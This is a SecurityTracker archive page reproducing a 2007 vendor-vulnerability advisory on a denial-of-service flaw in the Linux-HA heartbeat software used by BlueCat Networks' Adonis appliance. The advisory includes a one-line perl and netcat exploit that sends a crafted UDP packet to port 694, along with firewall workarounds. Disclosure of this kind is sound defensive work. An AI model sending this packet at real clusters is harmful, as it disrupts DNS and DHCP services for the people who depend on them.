SecurityTracker.com
    Home    |    View Topics    |    Search    |    Contact Us    |   

SecurityTracker
Archives


 


Category:   Device (Embedded Server/Appliance)  >   Adonis Vendors:   BlueCat Networks
BlueCat Networks Adonis Linux-HA Heartbeat Bug Lets Remote Users Deny Service
SecurityTracker Alert ID:  1018505
SecurityTracker URL:  http://securitytracker.com/id/1018505
CVE Reference:   CVE-2007-4205   (Links to External Site)
Updated:  Apr 21 2008
Original Entry Date:  Aug 3 2007
Impact:   Denial of service via network
Fix Available:  Yes  Vendor Confirmed:  Yes  Exploit Included:  Yes  
Version(s): 5.0.2.8; possibly other versions
Description:   A vulnerability was reported in Adonis. A remote user can cause denial of service conditions.

When XHA is configured, a remote user can send a specially crafted UDP packet to port 694 to cause the pair of target devices to both become active.

The vulnerability resides in the underlying Linux-HA softare.

A demonstration exploit command is provided:

$ perl -e 'print "###\n2147483647heart attack:%%%\n"' |
nc -u 192.168.1.12 694

It may also be possible to crash the control process on the passive node.

forloop discovered this vulnerability.

Impact:   A remote user can cause denial of service conditions.
Solution:   The vendor plans to issue a patch to set the firewall rules to block all traffic on port 694 to the cluster partner (to be available August 3, 2007).

The vendor plans to issue a fix (to be available later in August 2007).

Vendor URL:  www.bluecatnetworks.com/ (Links to External Site)
Cause:   State error

Message History:   None.


 Source Message Contents

Subject:  TS-2007-001-0: BlueCat Networks Adonis Linux-HA heartbeat DoS Vulnerability

Template Security Security Advisory
-----------------------------------

  BlueCat Networks Adonis Linux-HA heartbeat DoS Vulnerability

  Date: 2007-07-29
  Advisory ID: TS-2007-001-0
  Vendor: BlueCat Networks, http://www.bluecatnetworks.com/
  Revision: 0

Contents
--------

  Summary
  Software Version
  Details
  Impact
  Exploit
  Workarounds
  Obtaining Patched Software
  Credits
  Revision History

Summary
-------

  Template Security has discovered a serious Denial of Service
  (DoS) vulnerability in the BlueCat Networks Adonis DNS/DHCP
  Appliance.  When XHA is configured to place two Adonis
  servers in an active-passive pair to provide high
  availability, a remote attacker can transmit a single UDP
  datagram to crash the heartbeat control process.  This can
  be used for example to create an active/active condition in
  the cluster pair.

Software Version
----------------

 Adonis version 5.0.2.8 was tested, and XHA was configured
 using the Proteus IPAM appliance.  It is possible any version
 of Adonis using heartbeat version 1.2.4 or earlier is
 vulnerable.

Details
-------

  XHA on Adonis uses the heartbeat software from the Linux-HA
  project (http://www.linux-ha.org/).  On the version of
  Adonis we tested, heartbeat version 1.2.3 is used.  This
  version is vulnerable to a well-known remote DoS attack
  which was announced on 2006-08-13:

    http://www.linux-ha.org/_cache/SecurityIssues__sec03.txt

Impact
------

  Successful exploitation of the vulnerability will result in
  a DoS condition affecting critical DNS and DHCP services.

Exploit
-------

  In this example the XHA cluster is composed of:

    node-1: 192.168.1.12
    node-2: 192.168.1.13
    VIP:    192.168.1.11

  A remote attacker can perform the following to crash the
  heartbeat control process on node-1:

    $ perl -e 'print "###\n2147483647heart attack:%%%\n"' |
      nc -u 192.168.1.12 694

  If node-1 is the active node in the cluster, node-2 will
  take over the VIP and the cluster will be in an
  active/active condition.  Other scenarios are possible, such
  as crashing the control process on the passive node to
  prevent it from being able to assume the active role in a
  failure condition.

  Note that the iptables configuration on Adonis does not
  block packets to 694/udp; there is an explicit policy to
  permit port 694/udp from any to any in the INPUT and OUTPUT
  chain.  To verify this, you can login as root on the
  appliance and view the firewall configuration script:

    # grep 694 /usr/local/bluecat/doFirewall 
    iptables -A INPUT  -p udp --dport 694 -j ACCEPT
    iptables -A OUTPUT -p udp --dport 694 -j ACCEPT
    $IP6TABLES -A INPUT  -p udp --dport 694 -j ACCEPT
    $IP6TABLES -A OUTPUT -p udp --dport 694 -j ACCEPT

Workarounds
-----------

  The attack can be prevented by blocking packets to 694/udp.
  This can be performed at a firewall and by modifying the
  iptables configuration on the Adonis appliances.
  Appropriate anti-spoofing policies must also be in place,
  because an attacker can spoof the source IP address in the
  UDP datagram.

  When XHA was configured, iptables rules were configured in
  /usr/local/bluecat/firewall_rules/localHAFirewallConfig to
  permit 694/udp to and from the peer node on each appliance.
  However, these rules have no effect due to the rules
  mentioned above.  And they are also incorrect because they
  specify source port 694/udp, and the heartbeat packets we
  observed do not use a fixed source port.

  One possible workaround which may be used to temporarily
  prevent the attack is to comment out the 694/udp rules in
  the firewall startup script then repair the rules in
  localHAFirewallConfig.  However, localHAFirewallConfig can
  be overwritten by /usr/local/bluecat/configLocalFirewall.sh.
  Due to this, we recommend that customers do not modify the
  iptables configuration, and block 694/udp and perform
  anti-spoofing at a firewall.

Obtaining Patched Software
--------------------------

  Contact the vendor.

Credits
-------

  forloop discovered that Adonis XHA was using vulnerable
  heartbeat software, and defaultroute read the heartbeat code
  to discover the exploit.  Both are members of Template
  Security.

Revision History
----------------

  2007-07-29: Revision 0 released



 
 


Go to the Top of This SecurityTracker Archive Page





Home   |    View Topics   |    Search   |    Contact Us

This web site uses cookies for web analytics. Learn More

Copyright 2019, SecurityGlobal.net LLC